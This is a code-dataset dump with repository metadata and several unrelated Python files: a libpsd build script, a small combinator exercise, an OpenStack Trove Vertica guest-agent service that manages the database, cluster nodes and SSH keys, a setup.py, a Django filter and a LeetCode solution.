] | null | null | null | Thirdparty/libpsd/build.py | ANHELL-blitz/dava.engine | ed83624326f000866e29166c7f4cccfed1bb41d4 | [
"BSD-3-Clause"
] | 45 | 2018-05-11T06:47:17.000Z | 2022-02-03T11:30:55.000Z | import os
import shutil
import build_utils
def get_supported_targets(platform):
if platform == 'win32':
return ['win32']
elif platform == 'darwin':
return ['macos']
elif platform == 'linux':
return ['linux']
else:
return []
def get_dependencies_for_target(target):
if target == 'win32':
return ['zlib']
else:
return []
def build_for_target(target, working_directory_path, root_project_path):
if target == 'win32':
_build_win32(working_directory_path, root_project_path)
elif target == 'macos':
_build_macos(working_directory_path, root_project_path)
elif target == 'linux':
_build_linux(working_directory_path, root_project_path)
def get_download_info():
return 'https://sourceforge.net/projects/libpsd/files/libpsd/0.9/libpsd-0.9.zip'
def _download_and_extract(working_directory_path):
source_folder_path = os.path.join(working_directory_path, 'libpsd_source')
url = get_download_info()
build_utils.download_and_extract(
url,
working_directory_path,
source_folder_path,
build_utils.get_url_file_name_no_ext(url))
return source_folder_path
@build_utils.run_once
def _patch_sources(source_folder_path, working_directory_path):
build_utils.apply_patch(
os.path.abspath('patch_v0.9.diff'), working_directory_path)
shutil.copyfile(
'CMakeLists.txt', os.path.join(source_folder_path, 'CMakeLists.txt'))
def _build_win32(working_directory_path, root_project_path):
source_folder_path = _download_and_extract(working_directory_path)
_patch_sources(source_folder_path, working_directory_path)
cmake_flags = ['-DZLIB_INCLUDE_DIR=' + os.path.join(working_directory_path, '../zlib/zlib_source/')]
build_utils.build_and_copy_libraries_win32_cmake(
os.path.join(working_directory_path, 'gen'),
source_folder_path,
root_project_path,
'psd.sln', 'psd',
'psd.lib', 'psd.lib',
'libpsd.lib', 'libpsd.lib',
'libpsd.lib', 'libpsd.lib',
cmake_flags,
static_runtime=False)
_copy_headers(source_folder_path, root_project_path)
def _build_macos(working_directory_path, root_project_path):
source_folder_path = _download_and_extract(working_directory_path)
_patch_sources(source_folder_path, working_directory_path)
build_utils.build_and_copy_libraries_macos_cmake(
os.path.join(working_directory_path, 'gen'),
source_folder_path,
root_project_path,
'psd.xcodeproj', 'psd',
'libpsd.a',
'libpsd.a')
_copy_headers(source_folder_path, root_project_path)
def _build_linux(working_directory_path, root_project_path):
source_folder_path = _download_and_extract(working_directory_path)
_patch_sources(source_folder_path, working_directory_path)
build_utils.build_and_copy_libraries_linux_cmake(
gen_folder_path=os.path.join(working_directory_path, 'gen'),
source_folder_path=source_folder_path,
root_project_path=root_project_path,
target="all",
lib_name='libpsd.a')
_copy_headers(source_folder_path, root_project_path)
def _copy_headers(source_folder_path, root_project_path):
include_path = os.path.join(root_project_path, 'Libs/include/libpsd')
build_utils.copy_files_by_name(
os.path.join(source_folder_path, 'include'),
include_path,
['libpsd.h', 'psd_color.h', 'psd_types.h'])
| 31.585586 | 104 | 0.72162 | 454 | 3,506 | 5.092511 | 0.180617 | 0.152249 | 0.190311 | 0.12327 | 0.643166 | 0.626298 | 0.514273 | 0.497405 | 0.38192 | 0.38192 | 0 | 0.006952 | 0.179407 | 3,506 | 110 | 105 | 31.872727 | 0.796663 | 0 | 0 | 0.289157 | 0 | 0.012048 | 0.112094 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.120482 | false | 0 | 0.036145 | 0.012048 | 0.253012 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dc1969b2d44d9ad370f7f09a3b9e9919cb4e854 | 589 | py | Python | Combinatorialifier.py | Theta291/Partial-Application-in-Python | db503fbf7a1c173c01fca86a858875e38c41997a | [
"MIT"
] | null | null | null | Combinatorialifier.py | Theta291/Partial-Application-in-Python | db503fbf7a1c173c01fca86a858875e38c41997a | [
"MIT"
] | null | null | null | Combinatorialifier.py | Theta291/Partial-Application-in-Python | db503fbf7a1c173c01fca86a858875e38c41997a | [
"MIT"
] | null | null | null | #Exercise: Try to make a function that accepts a function of only positional arguments and returns a function that takes the same number of positional arguments and, given they are all iterators, attempts every combination of one arguments from each iterator.
#Skills: Partial application, Iteration
papplycomboreverse = lambda fun, xiter : lambda *args : [fun(*args, x) for x in xiter]
def combo(fun):
def returnfun(*args):
currfun = fun
for arg in reversed(args):
currfun = papplycomboreverse(currfun, arg)
return currfun()
return returnfun
| 45.307692 | 259 | 0.726655 | 79 | 589 | 5.417722 | 0.620253 | 0.063084 | 0.060748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212224 | 589 | 12 | 260 | 49.083333 | 0.922414 | 0.502547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dc490740f712aa8ee9b1a1e793a10bb7cab5ed9 | 27,885 | py | Python | trove-11.0.0/trove/guestagent/datastore/experimental/vertica/service.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 1 | 2020-04-08T07:42:19.000Z | 2020-04-08T07:42:19.000Z | trove/guestagent/datastore/experimental/vertica/service.py | ttcong/trove | 1db2dc63fdd5409eafccebe79ff2900d0535ed13 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | trove/guestagent/datastore/experimental/vertica/service.py | ttcong/trove | 1db2dc63fdd5409eafccebe79ff2900d0535ed13 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright [2015] Hewlett-Packard Development Company, L.P.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import tempfile
from oslo_log import log as logging
from oslo_utils import netutils
from six.moves import configparser
from trove.common import cfg
from trove.common.db import models
from trove.common import exception
from trove.common.i18n import _
from trove.common import instance as rd_instance
from trove.common.stream_codecs import PropertiesCodec
from trove.common import utils
from trove.guestagent.common.configuration import ConfigurationManager
from trove.guestagent.common.configuration import ImportOverrideStrategy
from trove.guestagent.common import guestagent_utils
from trove.guestagent.common import operating_system
from trove.guestagent.common.operating_system import FileMode
from trove.guestagent.datastore.experimental.vertica import system
from trove.guestagent.datastore import service
from trove.guestagent import pkg
from trove.guestagent import volume
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
packager = pkg.Package()
DB_NAME = 'db_srvr'
MOUNT_POINT = CONF.vertica.mount_point
# We will use a fake configuration file for the options managed through
# configuration groups that we apply directly with ALTER DB ... SET ...
FAKE_CFG = os.path.join(MOUNT_POINT, "vertica.cfg.fake")
class VerticaAppStatus(service.BaseDbStatus):
def _get_actual_db_status(self):
"""Get the status of dbaas and report it back."""
try:
out, err = system.shell_execute(system.STATUS_ACTIVE_DB,
system.VERTICA_ADMIN)
if out.strip() == DB_NAME:
# UP status is confirmed
LOG.info("Service Status is RUNNING.")
return rd_instance.ServiceStatuses.RUNNING
else:
LOG.info("Service Status is SHUTDOWN.")
return rd_instance.ServiceStatuses.SHUTDOWN
except exception.ProcessExecutionError:
LOG.exception("Failed to get database status.")
return rd_instance.ServiceStatuses.CRASHED
class VerticaApp(object):
"""Prepares DBaaS on a Guest container."""
def __init__(self, status):
self.state_change_wait_time = CONF.state_change_wait_time
self.status = status
revision_dir = \
guestagent_utils.build_file_path(
os.path.join(MOUNT_POINT,
os.path.dirname(system.VERTICA_ADMIN)),
ConfigurationManager.DEFAULT_STRATEGY_OVERRIDES_SUB_DIR)
if not operating_system.exists(FAKE_CFG):
operating_system.write_file(FAKE_CFG, '', as_root=True)
operating_system.chown(FAKE_CFG, system.VERTICA_ADMIN,
system.VERTICA_ADMIN_GRP, as_root=True)
operating_system.chmod(FAKE_CFG, FileMode.ADD_GRP_RX_OTH_RX(),
as_root=True)
self.configuration_manager = \
ConfigurationManager(FAKE_CFG, system.VERTICA_ADMIN,
system.VERTICA_ADMIN_GRP,
PropertiesCodec(delimiter='='),
requires_root=True,
override_strategy=ImportOverrideStrategy(
revision_dir, "cnf"))
def update_overrides(self, context, overrides, remove=False):
if overrides:
self.apply_overrides(overrides)
def remove_overrides(self):
config = self.configuration_manager.get_user_override()
self._reset_config(config)
self.configuration_manager.remove_user_override()
def apply_overrides(self, overrides):
self.configuration_manager.apply_user_override(overrides)
self._apply_config(overrides)
def _reset_config(self, config):
try:
db_password = self._get_database_password()
for k, v in config.items():
alter_db_cmd = system.ALTER_DB_RESET_CFG % (DB_NAME, str(k))
out, err = system.exec_vsql_command(db_password, alter_db_cmd)
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to remove config %s") % k)
except Exception:
LOG.exception("Vertica configuration remove failed.")
raise RuntimeError(_("Vertica configuration remove failed."))
LOG.info("Vertica configuration reset completed.")
def _apply_config(self, config):
try:
db_password = self._get_database_password()
for k, v in config.items():
alter_db_cmd = system.ALTER_DB_CFG % (DB_NAME, str(k), str(v))
out, err = system.exec_vsql_command(db_password, alter_db_cmd)
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to apply config %s") % k)
except Exception:
LOG.exception("Vertica configuration apply failed")
raise RuntimeError(_("Vertica configuration apply failed"))
LOG.info("Vertica config apply completed.")
def _enable_db_on_boot(self):
try:
command = ["sudo", "su", "-", system.VERTICA_ADMIN, "-c",
(system.SET_RESTART_POLICY % (DB_NAME, "always"))]
subprocess.Popen(command)
command = ["sudo", "su", "-", "root", "-c",
(system.VERTICA_AGENT_SERVICE_COMMAND % "enable")]
subprocess.Popen(command)
except Exception:
LOG.exception("Failed to enable database on boot.")
raise RuntimeError(_("Could not enable database on boot."))
def _disable_db_on_boot(self):
try:
command = (system.SET_RESTART_POLICY % (DB_NAME, "never"))
system.shell_execute(command, system.VERTICA_ADMIN)
command = (system.VERTICA_AGENT_SERVICE_COMMAND % "disable")
system.shell_execute(command)
except exception.ProcessExecutionError:
LOG.exception("Failed to disable database on boot.")
raise RuntimeError(_("Could not disable database on boot."))
def stop_db(self, update_db=False, do_not_start_on_reboot=False):
"""Stop the database."""
LOG.info("Stopping Vertica.")
if do_not_start_on_reboot:
self._disable_db_on_boot()
try:
# Stop vertica-agent service
command = (system.VERTICA_AGENT_SERVICE_COMMAND % "stop")
system.shell_execute(command)
# Using Vertica adminTools to stop db.
db_password = self._get_database_password()
stop_db_command = (system.STOP_DB % (DB_NAME, db_password))
out, err = system.shell_execute(system.STATUS_ACTIVE_DB,
system.VERTICA_ADMIN)
if out.strip() == DB_NAME:
system.shell_execute(stop_db_command, system.VERTICA_ADMIN)
if not self.status._is_restarting:
if not self.status.wait_for_real_status_to_change_to(
rd_instance.ServiceStatuses.SHUTDOWN,
self.state_change_wait_time, update_db):
LOG.error("Could not stop Vertica.")
self.status.end_restart()
raise RuntimeError(_("Could not stop Vertica!"))
LOG.debug("Database stopped.")
else:
LOG.debug("Database is not running.")
except exception.ProcessExecutionError:
LOG.exception("Failed to stop database.")
raise RuntimeError(_("Could not stop database."))
def start_db(self, update_db=False):
"""Start the database."""
LOG.info("Starting Vertica.")
try:
self._enable_db_on_boot()
# Start vertica-agent service
command = ["sudo", "su", "-", "root", "-c",
(system.VERTICA_AGENT_SERVICE_COMMAND % "start")]
subprocess.Popen(command)
# Using Vertica adminTools to start db.
db_password = self._get_database_password()
start_db_command = ["sudo", "su", "-", system.VERTICA_ADMIN, "-c",
(system.START_DB % (DB_NAME, db_password))]
subprocess.Popen(start_db_command)
if not self.status._is_restarting:
self.status.end_restart()
LOG.debug("Database started.")
except Exception as e:
raise RuntimeError(_("Could not start Vertica due to %s") % e)
def start_db_with_conf_changes(self, config_contents):
"""
Currently all that this method does is to start Vertica. This method
needs to be implemented to enable volume resize on guestagent side.
"""
LOG.info("Starting Vertica with configuration changes.")
if self.status.is_running:
format = 'Cannot start_db_with_conf_changes because status is %s.'
LOG.debug(format, self.status)
raise RuntimeError(format % self.status)
LOG.info("Initiating config.")
self.configuration_manager.save_configuration(config_contents)
self.start_db(True)
def restart(self):
"""Restart the database."""
try:
self.status.begin_restart()
self.stop_db()
self.start_db()
finally:
self.status.end_restart()
def add_db_to_node(self, members=netutils.get_my_ipv4()):
"""Add db to host with admintools"""
LOG.info("Calling admintools to add DB to host")
try:
# Create db after install
db_password = self._get_database_password()
create_db_command = (system.ADD_DB_TO_NODE % (members,
DB_NAME,
db_password))
system.shell_execute(create_db_command, "dbadmin")
except exception.ProcessExecutionError:
# Give vertica some time to get the node up, won't be available
# by the time adminTools -t db_add_node completes
LOG.info("adminTools failed as expected - wait for node")
self.wait_for_node_status()
LOG.info("Vertica add db to host completed.")
def remove_db_from_node(self, members=netutils.get_my_ipv4()):
"""Remove db from node with admintools"""
LOG.info("Removing db from node")
try:
# Create db after install
db_password = self._get_database_password()
create_db_command = (system.REMOVE_DB_FROM_NODE % (members,
DB_NAME,
db_password))
system.shell_execute(create_db_command, "dbadmin")
except exception.ProcessExecutionError:
# Give vertica some time to get the node up, won't be available
# by the time adminTools -t db_add_node completes
LOG.info("adminTools failed as expected - wait for node")
# Give vertica some time to take the node down - it won't be available
# by the time adminTools -t db_add_node completes
self.wait_for_node_status()
LOG.info("Vertica remove host from db completed.")
def create_db(self, members=netutils.get_my_ipv4()):
"""Prepare the guest machine with a Vertica db creation."""
LOG.info("Creating database on Vertica host.")
try:
# Create db after install
db_password = self._get_database_password()
create_db_command = (system.CREATE_DB % (members, DB_NAME,
MOUNT_POINT, MOUNT_POINT,
db_password))
system.shell_execute(create_db_command, system.VERTICA_ADMIN)
except Exception:
LOG.exception("Vertica database create failed.")
raise RuntimeError(_("Vertica database create failed."))
LOG.info("Vertica database create completed.")
def install_vertica(self, members=netutils.get_my_ipv4()):
"""Prepare the guest machine with a Vertica db creation."""
LOG.info("Installing Vertica Server.")
try:
# Create db after install
install_vertica_cmd = (system.INSTALL_VERTICA % (members,
MOUNT_POINT))
system.shell_execute(install_vertica_cmd)
except exception.ProcessExecutionError:
LOG.exception("install_vertica failed.")
raise RuntimeError(_("install_vertica failed."))
self._generate_database_password()
LOG.info("install_vertica completed.")
def update_vertica(self, command, members=netutils.get_my_ipv4()):
LOG.info("Calling update_vertica with command %s", command)
try:
update_vertica_cmd = (system.UPDATE_VERTICA % (command, members,
MOUNT_POINT))
system.shell_execute(update_vertica_cmd)
except exception.ProcessExecutionError:
LOG.exception("update_vertica failed.")
raise RuntimeError(_("update_vertica failed."))
# self._generate_database_password()
LOG.info("update_vertica completed.")
def add_udls(self):
"""Load the user defined load libraries into the database."""
LOG.info("Adding configured user defined load libraries.")
password = self._get_database_password()
loaded_udls = []
for lib in system.UDL_LIBS:
func_name = lib['func_name']
lib_name = lib['lib_name']
language = lib['language']
factory = lib['factory']
path = lib['path']
if os.path.isfile(path):
LOG.debug("Adding the %(func)s library as %(lib)s.",
{'func': func_name, 'lib': lib_name})
out, err = system.exec_vsql_command(
password,
system.CREATE_LIBRARY % (lib_name, path)
)
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to create library %s.")
% lib_name)
out, err = system.exec_vsql_command(
password,
system.CREATE_SOURCE % (func_name, language,
factory, lib_name)
)
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to create source %s.")
% func_name)
loaded_udls.append(func_name)
else:
LOG.warning("Skipping %(func)s as path %(path)s not "
"found.", {"func": func_name, "path": path})
LOG.info("The following UDL functions are available for use: %s",
loaded_udls)
def _generate_database_password(self):
"""Generate and write the password to vertica.cnf file."""
config = configparser.ConfigParser()
config.add_section('credentials')
config.set('credentials', 'dbadmin_password',
utils.generate_random_password())
self.write_config(config)
def write_config(self, config,
unlink_function=os.unlink,
temp_function=tempfile.NamedTemporaryFile):
"""Write the configuration contents to vertica.cnf file."""
LOG.debug('Defining config holder at %s.', system.VERTICA_CONF)
tempfile = temp_function('w', delete=False)
try:
config.write(tempfile)
tempfile.close()
command = (("install -o root -g root -m 644 %(source)s %(target)s"
) % {'source': tempfile.name,
'target': system.VERTICA_CONF})
system.shell_execute(command)
unlink_function(tempfile.name)
except Exception:
unlink_function(tempfile.name)
raise
def read_config(self):
"""Reads and returns the Vertica config."""
try:
config = configparser.ConfigParser()
config.read(system.VERTICA_CONF)
return config
except Exception:
LOG.exception("Failed to read config %s.", system.VERTICA_CONF)
raise RuntimeError
def _get_database_password(self):
"""Read the password from vertica.cnf file and return it."""
return self.read_config().get('credentials', 'dbadmin_password')
def install_if_needed(self, packages):
"""Install Vertica package if needed."""
LOG.info("Preparing Guest as Vertica Server.")
if not packager.pkg_is_installed(packages):
LOG.debug("Installing Vertica Package.")
packager.pkg_install(packages, None, system.INSTALL_TIMEOUT)
def _set_readahead_for_disks(self):
"""This method sets readhead size for disks as needed by Vertica."""
device = volume.VolumeDevice(CONF.device_path)
device.set_readahead_size(CONF.vertica.readahead_size)
LOG.debug("Set readhead size as required by Vertica.")
def prepare_for_install_vertica(self):
"""This method executes preparatory methods before
executing install_vertica.
"""
command = ("VERT_DBA_USR=%s VERT_DBA_HOME=/home/dbadmin "
"VERT_DBA_GRP=%s /opt/vertica/oss/python/bin/python"
" -m vertica.local_coerce" %
(system.VERTICA_ADMIN, system.VERTICA_ADMIN_GRP))
try:
self._set_readahead_for_disks()
system.shell_execute(command)
except exception.ProcessExecutionError:
LOG.exception("Failed to prepare for install_vertica.")
raise
def mark_design_ksafe(self, k):
"""Wrapper for mark_design_ksafe function for setting k-safety """
LOG.info("Setting Vertica k-safety to %s", str(k))
out, err = system.exec_vsql_command(self._get_database_password(),
system.MARK_DESIGN_KSAFE % k)
# Only fail if we get an ERROR as opposed to a warning complaining
# about setting k = 0
if "ERROR" in err:
LOG.error(err)
raise RuntimeError(_("Failed to set k-safety level %s.") % k)
def _create_user(self, username, password, role=None):
"""Creates a user, granting and enabling the given role for it."""
LOG.info("Creating user in Vertica database.")
out, err = system.exec_vsql_command(self._get_database_password(),
system.CREATE_USER %
(username, password))
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to create user %s.") % username)
if role:
self._grant_role(username, role)
def _grant_role(self, username, role):
"""Grants a role to the user on the schema."""
out, err = system.exec_vsql_command(self._get_database_password(),
system.GRANT_TO_USER
% (role, username))
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to grant role %(r)s to user "
"%(u)s.")
% {'r': role, 'u': username})
out, err = system.exec_vsql_command(self._get_database_password(),
system.ENABLE_FOR_USER
% (username, role))
if err:
LOG.warning(err)
def enable_root(self, root_password=None):
"""Resets the root password."""
LOG.info("Enabling root.")
user = models.DatastoreUser.root(password=root_password)
if not self.is_root_enabled():
self._create_user(user.name, user.password, 'pseudosuperuser')
else:
LOG.debug("Updating %s password.", user.name)
try:
out, err = system.exec_vsql_command(
self._get_database_password(),
system.ALTER_USER_PASSWORD % (user.name, user.password))
if err:
if err.is_warning():
LOG.warning(err)
else:
LOG.error(err)
raise RuntimeError(_("Failed to update %s "
"password.") % user.name)
except exception.ProcessExecutionError:
LOG.error("Failed to update %s password.", user.name)
raise RuntimeError(_("Failed to update %s password.")
% user.name)
return user.serialize()
def is_root_enabled(self):
"""Return True if root access is enabled else False."""
LOG.debug("Checking is root enabled.")
try:
out, err = system.shell_execute(system.USER_EXISTS %
(self._get_database_password(),
'root'), system.VERTICA_ADMIN)
if err:
LOG.error(err)
raise RuntimeError(_("Failed to query for root user."))
except exception.ProcessExecutionError:
raise RuntimeError(_("Failed to query for root user."))
return out.rstrip() == "1"
def get_public_keys(self, user):
"""Generates key (if not found), and sends public key for user."""
LOG.debug("Public keys requested for user: %s.", user)
user_home_directory = os.path.expanduser('~' + user)
public_key_file_name = user_home_directory + '/.ssh/id_rsa.pub'
try:
key_generate_command = (system.SSH_KEY_GEN % user_home_directory)
system.shell_execute(key_generate_command, user)
except exception.ProcessExecutionError:
LOG.debug("Cannot generate key.")
try:
read_key_cmd = ("cat %(file)s" % {'file': public_key_file_name})
out, err = system.shell_execute(read_key_cmd)
except exception.ProcessExecutionError:
LOG.exception("Cannot read public key.")
raise
return out.strip()
def authorize_public_keys(self, user, public_keys):
"""Adds public key to authorized_keys for user."""
LOG.debug("public keys to be added for user: %s.", user)
user_home_directory = os.path.expanduser('~' + user)
authorized_file_name = user_home_directory + '/.ssh/authorized_keys'
try:
read_key_cmd = ("cat %(file)s" % {'file': authorized_file_name})
out, err = system.shell_execute(read_key_cmd)
public_keys.append(out.strip())
except exception.ProcessExecutionError:
LOG.debug("Cannot read authorized_keys.")
all_keys = '\n'.join(public_keys) + "\n"
try:
with tempfile.NamedTemporaryFile("w", delete=False) as tempkeyfile:
tempkeyfile.write(all_keys)
copy_key_cmd = (("install -o %(user)s -m 600 %(source)s %(target)s"
) % {'user': user, 'source': tempkeyfile.name,
'target': authorized_file_name})
system.shell_execute(copy_key_cmd)
os.remove(tempkeyfile.name)
except exception.ProcessExecutionError:
LOG.exception("Cannot install public keys.")
os.remove(tempkeyfile.name)
raise
def _export_conf_to_members(self, members):
"""This method exports conf files to other members."""
try:
for member in members:
COPY_CMD = (system.SEND_CONF_TO_SERVER % (system.VERTICA_CONF,
member,
system.VERTICA_CONF))
system.shell_execute(COPY_CMD)
except exception.ProcessExecutionError:
LOG.exception("Cannot export configuration.")
raise
def install_cluster(self, members):
"""Installs & configures cluster."""
cluster_members = ','.join(members)
LOG.debug("Installing cluster with members: %s.", cluster_members)
self.install_vertica(cluster_members)
self._export_conf_to_members(members)
LOG.debug("Creating database with members: %s.", cluster_members)
self.create_db(cluster_members)
LOG.debug("Cluster configured on members: %s.", cluster_members)
def grow_cluster(self, members):
"""Adds nodes to cluster."""
cluster_members = ','.join(members)
LOG.debug("Growing cluster with members: %s.", cluster_members)
self.update_vertica("--add-hosts", cluster_members)
self._export_conf_to_members(members)
LOG.debug("Creating database with members: %s.", cluster_members)
self.add_db_to_node(cluster_members)
LOG.debug("Cluster configured on members: %s.", cluster_members)
def shrink_cluster(self, members):
"""Removes nodes from cluster."""
cluster_members = ','.join(members)
LOG.debug("Shrinking cluster with members: %s.", cluster_members)
self.remove_db_from_node(cluster_members)
self.update_vertica("--remove-hosts", cluster_members)
def wait_for_node_status(self, status='UP'):
"""Wait until all nodes are the same status"""
# select node_state from nodes where node_state <> 'UP'
def _wait_for_node_status():
out, err = system.exec_vsql_command(self._get_database_password(),
system.NODE_STATUS % status)
LOG.debug("Polled vertica node states: %s", out)
if err:
LOG.error(err)
raise RuntimeError(_("Failed to query for root user."))
return "0 rows" in out
try:
utils.poll_until(_wait_for_node_status, time_out=600,
sleep_time=15)
except exception.PollTimeOut:
raise RuntimeError(_("Timed out waiting for cluster to "
"change to status %s") % status)
| 45.048465 | 79 | 0.58146 | 3,029 | 27,885 | 5.13932 | 0.146253 | 0.011691 | 0.02197 | 0.022162 | 0.419606 | 0.359286 | 0.309372 | 0.252329 | 0.22779 | 0.206848 | 0 | 0.001551 | 0.329281 | 27,885 | 618 | 80 | 45.121359 | 0.830776 | 0.103174 | 0 | 0.349594 | 0 | 0 | 0.134907 | 0.004358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079268 | false | 0.081301 | 0.046748 | 0 | 0.148374 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7dcd9cbc95d9ac46a0346d6a8f8325d12f3bf6be | 681 | py | Python | setup.py | jacobschaer/qt_compat | 8121500c1fb6f95d3cfff033410e055a187a39c9 | [
"MIT"
] | null | null | null | setup.py | jacobschaer/qt_compat | 8121500c1fb6f95d3cfff033410e055a187a39c9 | [
"MIT"
] | null | null | null | setup.py | jacobschaer/qt_compat | 8121500c1fb6f95d3cfff033410e055a187a39c9 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="QtCompat",
version="0.1",
packages=find_packages(),
scripts=[],
# Project uses reStructuredText, so ensure that the docutils get
# installed or upgraded on the target machine
install_requires=[],
package_data={
},
# metadata for upload to PyPI
author="Jacob Schaer",
author_email="",
description="PyQt4, 5 and Pyside Compatibility Library",
license="MIT",
keywords="pyqt4 pyqt5 pyside compatibility",
url="https://github.com/jacobschaer/qt_compat/", # project home page, if any
# could also include long_description, download_url, classifiers, etc.
) | 28.375 | 82 | 0.690162 | 81 | 681 | 5.703704 | 0.851852 | 0.051948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011091 | 0.20558 | 681 | 24 | 83 | 28.375 | 0.842884 | 0.33627 | 0 | 0 | 0 | 0 | 0.313199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dcea3fbbfd1ee77dfca864ce3a07a6ca9ff127e | 389 | py | Python | annotations/filters.py | acdh-oeaw/ner-annotator | ee8f72248669b848eb273644d80ad52dc495a07c | [
"MIT"
] | 1 | 2019-01-02T15:05:30.000Z | 2019-01-02T15:05:30.000Z | annotations/filters.py | acdh-oeaw/ner-annotator | ee8f72248669b848eb273644d80ad52dc495a07c | [
"MIT"
] | 8 | 2020-02-11T23:02:04.000Z | 2021-06-10T20:39:58.000Z | annotations/filters.py | acdh-oeaw/ner-annotator | ee8f72248669b848eb273644d80ad52dc495a07c | [
"MIT"
] | 1 | 2019-01-02T15:05:31.000Z | 2019-01-02T15:05:31.000Z | import django_filters
from . models import NerSample
class NerSampleListFilter(django_filters.FilterSet):
text = django_filters.CharFilter(
lookup_expr='icontains',
help_text=NerSample._meta.get_field('text').help_text,
label=NerSample._meta.get_field('text').verbose_name
)
class Meta:
model = NerSample
fields = ['text', 'id']
| 24.3125 | 62 | 0.678663 | 43 | 389 | 5.883721 | 0.55814 | 0.15415 | 0.126482 | 0.166008 | 0.197628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218509 | 389 | 15 | 63 | 25.933333 | 0.832237 | 0 | 0 | 0 | 0 | 0 | 0.059126 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dd3f523efb7218a00299577b756498b0e6e336c | 508 | py | Python | submissions/mirror-reflection/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | null | null | null | submissions/mirror-reflection/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | 1 | 2022-03-04T20:24:32.000Z | 2022-03-04T20:31:58.000Z | submissions/mirror-reflection/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | null | null | null | # https://leetcode.com/problems/mirror-reflection
class Solution:
def mirrorReflection(self, p, q):
if q == 0:
return 0
i = 0
val = 0
while True:
val += q
i += 1
if (i % 2 == 0) and (val % p == 0):
return 2
elif (i % 2 == 1) and (val % (2 * p) == 0):
return 0
elif (i % 2 == 1) and (val % p == 0):
return 1
else:
continue
| 24.190476 | 55 | 0.36811 | 61 | 508 | 3.065574 | 0.42623 | 0.149733 | 0.128342 | 0.085562 | 0.256684 | 0.139037 | 0 | 0 | 0 | 0 | 0 | 0.072581 | 0.511811 | 508 | 20 | 56 | 25.4 | 0.681452 | 0.09252 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
